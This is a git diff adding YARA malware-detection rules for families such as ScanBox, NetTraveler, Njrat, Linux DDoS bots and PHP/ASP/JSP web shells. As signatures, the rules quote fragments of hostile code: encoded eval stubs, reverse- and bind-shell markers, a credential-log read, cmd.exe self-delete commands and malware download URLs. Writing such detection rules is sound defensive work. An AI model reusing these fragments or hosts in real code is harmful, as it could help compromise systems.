+ $a = /pipe\\[A-F0-9]{32}/ //Named pipe created by the malware
+ $b = /id=[A-F0-9]{32}/ //Portion or the uri beacon
+ $c = /MASTER_[A-F0-9]{32}/ //Mutex created by the malware
+ $d = "***Load injects by PIPE (%s)" //String found in binary
+ $e = "***Load injects url=%s (%s)" //String found in binary
+ $f = "*********************** Ping Ok ************************" //String found in binary
+ $g = "*** LOG INJECTS *** %s" //String found in binary
+
+ condition:
+ any of them
+
+}
+
+rule RookieStrings : Rookie Family
+{
+ meta:
+ description = "Rookie Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "RookIE/1.0"
+
+ condition:
+ any of them
+}
+
+rule ScanBox_Malware_Generic {
+ meta:
+ description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
+ author = "Florian Roth"
+ reference1 = "http://goo.gl/MUUfjv"
+ reference2 = "http://goo.gl/WXUQcP"
+ date = "2015/02/28"
+ hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+ hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+ hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
+ strings:
+ /* Sample 1 */
+ $s0 = "http://142.91.76.134/p.dat" fullword ascii
+ $s1 = "HttpDump 1.1" fullword ascii
+
+ /* Sample 2 */
+ $s3 = "SecureInput .exe" fullword wide
+ $s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+
+ /* Sample 3 */
+ $s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+ $s6 = "ServiceMaix" fullword ascii
+
+ /* Certificate and Keywords */
+ $x1 = "Management Support Team1" fullword ascii
+ $x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+ $s3 = "SEOUL1" fullword ascii
+ condition:
+ ( 1 of ($s*) and 2 of ($x*) ) or
+ ( 3 of ($x*) )
+}
+
+rule TrojanDownloader {
+ meta:
+ description = "Trojan Downloader - Flash Exploit Feb15"
+ author = "Florian Roth"
+ reference = "http://goo.gl/wJ8V1I"
+ date = "2015/02/11"
+ hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
+ score = 60
+ strings:
+ $x1 = "Hello World!" fullword ascii
+ $x2 = "CONIN$" fullword ascii
+
+ $s6 = "GetCommandLineA" fullword ascii
+ $s7 = "ExitProcess" fullword ascii
+ $s8 = "CreateFileA" fullword ascii
+
+ $s5 = "SetConsoleMode" fullword ascii
+ $s9 = "TerminateProcess" fullword ascii
+ $s10 = "GetCurrentProcess" fullword ascii
+ $s11 = "UnhandledExceptionFilter" fullword ascii
+ $s3 = "user32.dll" fullword ascii
+ $s16 = "GetEnvironmentStrings" fullword ascii
+ $s2 = "GetLastActivePopup" fullword ascii
+ $s17 = "GetFileType" fullword ascii
+ $s19 = "HeapCreate" fullword ascii
+ $s20 = "VirtualFree" fullword ascii
+ $s21 = "WriteFile" fullword ascii
+ $s22 = "GetOEMCP" fullword ascii
+ $s23 = "VirtualAlloc" fullword ascii
+ $s24 = "GetProcAddress" fullword ascii
+ $s26 = "FlushFileBuffers" fullword ascii
+ $s27 = "SetStdHandle" fullword ascii
+ $s28 = "KERNEL32.dll" fullword ascii
+ condition:
+ $x1 and $x2 and ( all of ($s*) ) and filesize < 35000
+}
+
+rule Embedded_EXE_Cloaking {
+ meta:
+ description = "Detects an embedded executable in a non-executable file"
+ author = "Florian Roth"
+ date = "2015/02/27"
+ score = 80
+ strings:
+ $noex_png = { 89 50 4E 47 }
+ $noex_pdf = { 25 50 44 46 }
+ $noex_rtf = { 7B 5C 72 74 66 31 }
+ $noex_jpg = { FF D8 FF E0 }
+ $noex_gif = { 47 49 46 38 }
+ $mz = { 4D 5A }
+ $a1 = "This program cannot be run in DOS mode"
+ $a2 = "This program must be run under Win32"
+ condition:
+ (
+ ( $noex_png at 0 ) or
+ ( $noex_pdf at 0 ) or
+ ( $noex_rtf at 0 ) or
+ ( $noex_jpg at 0 ) or
+ ( $noex_gif at 0 )
+ )
+ and
+ for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )
+}
+
+rule Cloaked_as_JPG {
+ meta:
+ description = "Detects a cloaked file as JPG"
+ author = "Florian Roth (eval section from Didier Stevens)"
+ date = "2015/02/29"
+ score = 70
+ strings:
+ $ext = "extension: .jpg"
+ condition:
+ $ext and uint16be(0x00) != 0xFFD8
+}
+
+rule WindowsCredentialEditor
+{
+ meta:
+ description = "Windows Credential Editor" threat_level = 10 score = 90
+ strings:
+ $a = "extract the TGT session key"
+ $b = "Windows Credentials Editor"
+ condition:
+ $a or $b
+}
+
+rule Amplia_Security_Tool
+{
+ meta:
+ description = "Amplia Security Tool"
+ score = 60
+ nodeepdive = 1
+ strings:
+ $a = "Amplia Security"
+ $b = "Hernan Ochoa"
+ $c = "getlsasrvaddr.exe"
+ $d = "Cannot get PID of LSASS.EXE"
+ $e = "extract the TGT session key"
+ $f = "PPWDUMP_DATA"
+ condition: 1 of them
+}
+
+
+
+rule perlbot_pl {
+ meta:
+ description = "Semi-Auto-generated - file perlbot.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "7e4deb9884ffffa5d82c22f8dc533a45"
+ strings:
+ $s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
+ $s1 = "#Acesso a Shel - 1 ON 0 OFF"
+ condition:
+ 1 of them
+}
+rule php_backdoor_php {
+ meta:
+ description = "Semi-Auto-generated - file php-backdoor.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
+ strings:
+ $s0 = "http://michaeldaw.org 2006"
+ $s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
+ $s3 = "coded by z0mbie"
+ condition:
+ 1 of them
+}
+rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
+ meta:
+ description = "Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+ strings:
+ $s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
+ $s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
+ $s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+ condition:
+ 1 of them
+}
+rule Nshell__1__php_php {
+ meta:
+ description = "Semi-Auto-generated - file Nshell (1).php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "973fc89694097a41e684b43a21b1b099"
+ strings:
+ $s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
+ $s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+ condition:
+ 1 of them
+}
+rule shankar_php_php {
+ meta:
+ description = "Semi-Auto-generated - file shankar.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "6eb9db6a3974e511b7951b8f7e7136bb"
+ strings:
+ $sAuthor = "ShAnKaR"
+ $s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
+ $s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+ condition:
+ 1 of ($s*) and $sAuthor
+}
+rule Casus15_php_php {
+ meta:
+ description = "Semi-Auto-generated - file Casus15.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
+ strings:
+ $s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
+ $s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
+ $s3 = "value='Calistirmak istediginiz "
+ condition:
+ 1 of them
+}
+rule small_php_php {
+ meta:
+ description = "Semi-Auto-generated - file small.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "fcee6226d09d150bfa5f103bee61fbde"
+ strings:
+ $s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
+ $s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
+ $s4 = "@ini_set('error_log',NULL);" fullword
+ condition:
+ 2 of them
+}
+rule shellbot_pl {
+ meta:
+ description = "Semi-Auto-generated - file shellbot.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
+ strings:
+ $s0 = "ShellBOT"
+ $s1 = "PacktsGr0up"
+ $s2 = "CoRpOrAtIoN"
+ $s3 = "# Servidor de irc que vai ser usado "
+ $s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+ condition:
+ 2 of them
+}
+rule fuckphpshell_php {
+ meta:
+ description = "Semi-Auto-generated - file fuckphpshell.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "554e50c1265bb0934fcc8247ec3b9052"
+ strings:
+ $s0 = "$succ = \"Warning! "
+ $s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
+ $s2 = "\\*=-- MEMBERS AREA --=*/"
+ $s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+ condition:
+ 2 of them
+}
+rule ngh_php_php {
+ meta:
+ description = "Semi-Auto-generated - file ngh.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "c372b725419cdfd3f8a6371cfeebc2fd"
+ strings:
+ $s0 = "Cr4sh_aka_RKL"
+ $s1 = "NGH edition"
+ $s2 = "/* connectback-backdoor on perl"
+ $s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
+ $s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+ condition:
+ 1 of them
+}
+rule jsp_reverse_jsp {
+ meta:
+ description = "Semi-Auto-generated - file jsp-reverse.jsp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8b0e6779f25a17f0ffb3df14122ba594"
+ strings:
+ $s0 = "// backdoor.jsp"
+ $s1 = "JSP Backdoor Reverse Shell"
+ $s2 = "http://michaeldaw.org"
+ condition:
+ 1 of them
+}
+rule Tool_asp {
+ meta:
+ description = "Semi-Auto-generated - file Tool.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
+ strings:
+ $s0 = "mailto:rhfactor@antisocial.com"
+ $s2 = "?raiz=root"
+ $s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
+ $s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+ condition:
+ 2 of them
+}
+rule NT_Addy_asp {
+ meta:
+ description = "Semi-Auto-generated - file NT Addy.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "2e0d1bae844c9a8e6e351297d77a1fec"
+ strings:
+ $s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
+ $s2 = "<ERROR: THIS IS NOT A TEXT FILE>"
+ $s4 = "RAW D.O.S. COMMAND INTERFACE"
+ condition:
+ 1 of them
+}
+rule SimAttacker___Vrsion_1_0_0___priv8_4_My_friend_php {
+ meta:
+ description = "Semi-Auto-generated - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+ strings:
+ $s0 = "SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend"
+ $s3 = " fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+ $s4 = "echo \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora"
+ condition:
+ 1 of them
+}
+rule RemExp_asp {
+ meta:
+ description = "Semi-Auto-generated - file RemExp.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+ strings:
+ $s0 = "<title>Remote Explorer</title>"
+ $s3 = " FSO.CopyFile Request.QueryString(\"FolderPath\") & Request.QueryString(\"CopyFi"
+ $s4 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f"
+ condition:
+ 2 of them
+}
+rule phvayvv_php_php {
+ meta:
+ description = "Semi-Auto-generated - file phvayvv.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "35fb37f3c806718545d97c6559abd262"
+ strings:
+ $s0 = "{mkdir(\"$dizin/$duzenx2\",777)"
+ $s1 = "$baglan=fopen($duzkaydet,'w');"
+ $s2 = "PHVayv 1.0"
+ condition:
+ 1 of them
+}
+rule klasvayv_asp {
+ meta:
+ description = "Semi-Auto-generated - file klasvayv.asp.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "2b3e64bf8462fc3d008a3d1012da64ef"
+ strings:
+ $s1 = "set aktifklas=request.querystring(\"aktifklas\")"
+ $s2 = "action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%>"
+ $s3 = "<font color=\"#858585\">www.aventgrup.net"
+ $s4 = "style=\"BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT"
+ condition:
+ 1 of them
+}
+rule r57shell_php_php {
+ meta:
+ description = "Semi-Auto-generated - file r57shell.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "d28445de424594a5f14d0fe2a7c4e94f"
+ strings:
+ $s0 = "r57shell" fullword
+ $s1 = " else if ($HTTP_POST_VARS['with'] == \"lynx\") { $HTTP_POST_VARS['cmd']= \"lynx "
+ $s2 = "RusH security team"
+ $s3 = "'ru_text12' => 'back-connect"
+ condition:
+ 1 of them
+}
+rule rst_sql_php_php {
+ meta:
+ description = "Semi-Auto-generated - file rst_sql.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "0961641a4ab2b8cb4d2beca593a92010"
+ strings:
+ $s0 = "C:\\tmp\\dump_"
+ $s1 = "RST MySQL"
+ $s2 = "http://rst.void.ru"
+ $s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"
+ condition:
+ 2 of them
+}
+rule wh_bindshell_py {
+ meta:
+ description = "Semi-Auto-generated - file wh_bindshell.py.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "fab20902862736e24aaae275af5e049c"
+ strings:
+ $s0 = "#Use: python wh_bindshell.py [port] [password]"
+ $s2 = "python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"" fullword
+ $s3 = "#bugz: ctrl+c etc =script stoped=" fullword
+ condition:
+ 1 of them
+}
+rule lurm_safemod_on_cgi {
+ meta:
+ description = "Semi-Auto-generated - file lurm_safemod_on.cgi.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "5ea4f901ce1abdf20870c214b3231db3"
+ strings:
+ $s0 = "Network security team :: CGI Shell" fullword
+ $s1 = "#########################<<KONEC>>#####################################" fullword
+ $s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
+ condition:
+ 1 of them
+}
+rule c99madshell_v2_0_php_php {
+ meta:
+ description = "Semi-Auto-generated - file c99madshell_v2.0.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "d27292895da9afa5b60b9d3014f39294"
+ strings:
+ $s2 = "eval(gzinflate(base64_decode('HJ3HkqNQEkU/ZzqCBd4t8V4YAQI2E3jvPV8/1Gw6orsVFLyXef"
+ condition:
+ all of them
+}
+rule backupsql_php_often_with_c99shell {
+ meta:
+ description = "Semi-Auto-generated - file backupsql.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "ab1a06ab1a1fe94e3f3b7f80eedbc12f"
+ strings:
+ $s2 = "//$message.= \"--{$mime_boundary}\\n\" .\"Content-Type: {$fileatt_type};\\n\" ."
+ $s4 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
+ condition:
+ all of them
+}
+rule uploader_php_php {
+ meta:
+ description = "Semi-Auto-generated - file uploader.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "0b53b67bb3b004a8681e1458dd1895d0"
+ strings:
+ $s2 = "move_uploaded_file($userfile, \"entrika.php\"); " fullword
+ $s3 = "Send this file: <INPUT NAME=\"userfile\" TYPE=\"file\">" fullword
+ $s4 = "<INPUT TYPE=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000\">" fullword
+ condition:
+ 2 of them
+}
+rule telnet_pl {
+ meta:
+ description = "Semi-Auto-generated - file telnet.pl.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "dd9dba14383064e219e29396e242c1ec"
+ strings:
+ $s0 = "W A R N I N G: Private Server"
+ $s2 = "$Message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ "
+ condition:
+ all of them
+}
+rule w3d_php_php {
+ meta:
+ description = "Semi-Auto-generated - file w3d.php.php.txt"
+ author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+ hash = "987f66b29bfb209a0b4f097f84f57c3b"
+ strings:
+ $s0 = "W3D Shell"
+ $s1 = "By: Warpboy"
+ $s2 = "No Query Executed"
+ condition:
+ 2 of them
+}
+
+
+rule rtf_yahoo_ken
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "Yahoo Ken"
+ filetype = "RTF"
+ version = "0.1"
+ description = "Test rule"
+ date = "2013-12-14"
+strings:
+ $magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+ $magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+ $magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+ $author1 = { 79 61 68 6f 6f 20 6b 65 63 } // "yahoo ken"
+condition:
+ ($magic1 or $magic2 or $magic3 at 0) and $author1
+}
+
+
+rule ZXProxy
+{
+meta:
+ author = "ThreatConnect Intelligence Research Team"
+
+strings:
+ $C = "\\Control\\zxplug" nocase wide ascii
+ $h = "http://www.facebook.com/comment/update.exe" wide ascii
+ $S = "Shared a shell to %s:%s Successfully" nocase wide ascii
+condition:
+ any of them
+}
+
diff --git a/malware/Miscelanea_Linux.yar b/malware/Miscelanea_Linux.yar
new file mode 100644
index 0000000..9dbd86a
--- /dev/null
+++ b/malware/Miscelanea_Linux.yar
@@ -0,0 +1,77 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule LinuxAESDDoS
+{
+ meta:
+ author = "@benkow_"
+ description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+ strings:
+ $a = "3AES"
+ $b = "Hacker"
+ $c = "VERSONEX"
+
+ condition:
+ 2 of ($a,$b,$c)
+}
+
+rule LinuxBillGates
+{
+ meta:
+ author = "@benkow_"
+ description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429"
+
+ strings:
+ $a= "12CUpdateGates"
+ $b= "11CUpdateBill"
+
+ condition:
+ $a and $b
+}
+
+rule LinuxElknot
+{
+ meta:
+ author = "@benkow_"
+ description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
+
+ strings:
+ $a = "ZN8CUtility7DeCryptEPciPKci"
+ $b = "ZN13CThreadAttack5StartEP11CCmdMessage"
+
+ condition:
+ $a and $b
+}
+
+rule LinuxMrBlack
+{
+ meta:
+ author = "@benkow_"
+ description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+ strings:
+ $a = "Mr.Black"
+ $b = "VERS0NEX:%s|%d|%d|%s"
+ condition:
+ $a and $b
+}
+
+rule LinuxTsunami
+{
+ meta:
+ author = "@benkow_"
+ description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
+
+ strings:
+ $a = "PRIVMSG %s :[STD]Hitting %s"
+ $b = "NOTICE %s :TSUNAMI <target> <secs>"
+ $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
+ condition:
+ $a or $b or $c
+}
diff --git a/malware/Miscelanea_RTF.yar b/malware/Miscelanea_RTF.yar
new file mode 100644
index 0000000..3f4ae9a
--- /dev/null
+++ b/malware/Miscelanea_RTF.yar
@@ -0,0 +1,25 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule rtf_multiple
+{
+meta:
+ author = "@patrickrolsen"
+ maltype = "Multiple"
+ version = "0.1"
+ reference = "fd69a799e21ccb308531ce6056944842"
+ date = "01/04/2014"
+strings:
+ $rtf = { 7b 5c 72 74 ?? ?? } // {\rt01 {\rtf1 {\rtxa
+ $string1 = "author user"
+ $string2 = "title Vjkygdjdtyuj" nocase
+ $string3 = "company ooo"
+ $string4 = "password 00000000"
+condition:
+ ($rtf at 0) and (all of ($string*))
+}
diff --git a/malware/NSFree.yar b/malware/NSFree.yar
new file mode 100644
index 0000000..2cad299
--- /dev/null
+++ b/malware/NSFree.yar
@@ -0,0 +1,53 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NSFreeCode : NSFree Family
+{
+ meta:
+ description = "NSFree code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-24"
+
+ strings:
+ // push vars then look for MZ
+ $ = { 53 56 57 66 81 38 4D 5A }
+ // nops then look for PE\0\0
+ $ = { 90 90 90 90 81 3F 50 45 00 00 }
+
+ condition:
+ all of them
+}
+
+rule NSFreeStrings : NSFree Family
+{
+ meta:
+ description = "NSFree Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-24"
+
+ strings:
+ $ = "\\MicNS\\" nocase
+ $ = "NSFreeDll" wide ascii
+ // xor 0x58 dos stub
+ $ = { 0c 30 31 2b 78 28 2a 37 3f 2a 39 35 78 3b 39 36 36 37 }
+
+ condition:
+ any of them
+}
+
+rule NSFree : Family
+{
+ meta:
+ description = "NSFree"
+ author = "Seth Hardy"
+ last_modified = "2014-06-24"
+
+ condition:
+ NSFreeCode or NSFreeStrings
+}
+
+
diff --git a/malware/Naikon.yar b/malware/Naikon.yar
new file mode 100644
index 0000000..dd10c3f
--- /dev/null
+++ b/malware/Naikon.yar
@@ -0,0 +1,53 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NaikonCode : Naikon Family
+{
+ meta:
+ description = "Naikon code features"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ // decryption
+ $ = { 0F AF C1 C1 E0 1F } // imul eax, ecx; shl eah, 1fh
+ $ = { 35 5A 01 00 00} // xor eax, 15ah
+ $ = { 81 C2 7F 14 06 00 } // add edx, 6147fh
+
+ condition:
+ all of them
+}
+
+rule NaikonStrings : Naikon Family
+{
+ meta:
+ description = "Naikon Identifying Strings"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ strings:
+ $ = "NOKIAN95/WEB"
+ $ = "/tag=info&id=15"
+ $ = "skg(3)=&3.2d_u1"
+ $ = "\\Temp\\iExplorer.exe"
+ $ = "\\Temp\\\"TSG\""
+
+ condition:
+ any of them
+}
+
+rule Naikon : Family
+{
+ meta:
+ description = "Naikon"
+ author = "Seth Hardy"
+ last_modified = "2014-06-25"
+
+ condition:
+ NaikonCode or NaikonStrings
+}
+
diff --git a/malware/NetPass.yar b/malware/NetPass.yar
new file mode 100644
index 0000000..103189a
--- /dev/null
+++ b/malware/NetPass.yar
@@ -0,0 +1,39 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetpassStrings : NetPass Variant {
+
+ meta:
+ description = "Identifiers for netpass variant"
+ author = "Katie Kleemola"
+ last_updated = "2014-05-29"
+
+ strings:
+ $exif1 = "Device Protect ApplicatioN" wide
+ $exif2 = "beep.sys" wide //embedded exe name
+ $exif3 = "BEEP Driver" wide //embedded exe description
+
+ $string1 = "\x00NetPass Update\x00"
+ $string2 = "\x00%s:DOWNLOAD\x00"
+ $string3 = "\x00%s:UPDATE\x00"
+ $string4 = "\x00%s:uNINSTALL\x00"
+
+ condition:
+ all of ($exif*) or any of ($string*)
+
+}
+
+rule NetPass : Variant {
+ meta:
+ description = "netpass variant"
+ author = "Katie Kleemola"
+ last_updated = "2014-07-08"
+ condition:
+ NetpassStrings
+}
+
+
diff --git a/malware/NetTraveler.yar b/malware/NetTraveler.yar
new file mode 100644
index 0000000..1a521a9
--- /dev/null
+++ b/malware/NetTraveler.yar
@@ -0,0 +1,63 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule NetTravStrings : NetTraveler Family {
+
+
+ meta:
+ description = "Identifiers for NetTraveler DLL"
+ author = "Katie Kleemola"
+ last_updated = "2014-05-20"
+
+ strings:
+ //network strings
+ $ = "?action=updated&hostid="
+ $ = "travlerbackinfo"
+ $ = "?action=getcmd&hostid="
+ $ = "%s?action=gotcmd&hostid="
+ $ = "%s?hostid=%s&hostname=%s&hostip=%s&filename=%s&filestart=%u&filetext="
+
+ //debugging strings
+ $ = "\x00Method1 Fail!!!!!\x00"
+ $ = "\x00Method3 Fail!!!!!\x00"
+ $ = "\x00method currect:\x00"
+ $ = /\x00\x00[\w\-]+ is Running!\x00\x00/
+ $ = "\x00OtherTwo\x00"
+
+ condition:
+ any of them
+
+}
+
+rule NetTravExports : NetTraveler Family {
+
+ meta:
+ description = "Export names for dll component"
+ author = "Katie Kleemola"
+ last_updated = "2014-05-20"
+
+ strings:
+ //dll component exports
+ $ = "?InjectDll@@YAHPAUHWND__@@K@Z"
+ $ = "?UnmapDll@@YAHXZ"
+ $ = "?g_bSubclassed@@3HA"
+
+ condition:
+ any of them
+}
+
+rule NetTraveler : Family {
+ meta:
+ description = "Nettravelr"
+ author = "Katie Kleemola"
+ last_updated = "2014-07-08"
+
+ condition:
+ NetTravExports or NetTravStrings or NetpassStrings
+
+}
+
diff --git a/malware/Njrat.yar b/malware/Njrat.yar
new file mode 100644
index 0000000..2485ced
--- /dev/null
+++ b/malware/Njrat.yar
@@ -0,0 +1,35 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Njrat
+{
+ meta:
+ description = "Njrat"
+ author = "botherder https://github.com/botherder"
+
+ strings:
+ $string1 = /(F)romBase64String/
+ $string2 = /(B)ase64String/
+ $string3 = /(C)onnected/ wide ascii
+ $string4 = /(R)eceive/
+ $string5 = /(S)end/ wide ascii
+ $string6 = /(D)ownloadData/ wide ascii
+ $string7 = /(D)eleteSubKey/ wide ascii
+ $string8 = /(g)et_MachineName/
+ $string9 = /(g)et_UserName/
+ $string10 = /(g)et_LastWriteTime/
+ $string11 = /(G)etVolumeInformation/
+ $string12 = /(O)SFullName/ wide ascii
+ $string13 = /(n)etsh firewall/ wide
+ $string14 = /(c)md\.exe \/k ping 0 & del/ wide
+ $string15 = /(c)md\.exe \/c ping 127\.0\.0\.1 & del/ wide
+ $string16 = /(c)md\.exe \/c ping 0 -n 2 & del/ wide
+ $string17 = {7C 00 27 00 7C 00 27 00 7C}
+
+ condition:
+ 10 of them
+}
diff --git a/malware/Notepad.yar b/malware/Notepad.yar
new file mode 100644
index 0000000..f5144f6
--- /dev/null
+++ b/malware/Notepad.yar
@@ -0,0 +1,21 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule TROJAN_Notepad {
+ meta:
+ Author = "RSA_IR"
+ Date = "4Jun13"
+ File = "notepad.exe v 1.1"
+ MD5 = "106E63DBDA3A76BEEB53A8BBD8F98927"
+ strings:
+ $s1 = "75BAA77C842BE168B0F66C42C7885997"
+ $s2 = "B523F63566F407F3834BCC54AAA32524"
+ condition:
+ $s1 or $s2
+}
+
+
diff --git a/malware/Olyx.yar b/malware/Olyx.yar
new file mode 100644
index 0000000..ba9e5e1
--- /dev/null
+++ b/malware/Olyx.yar
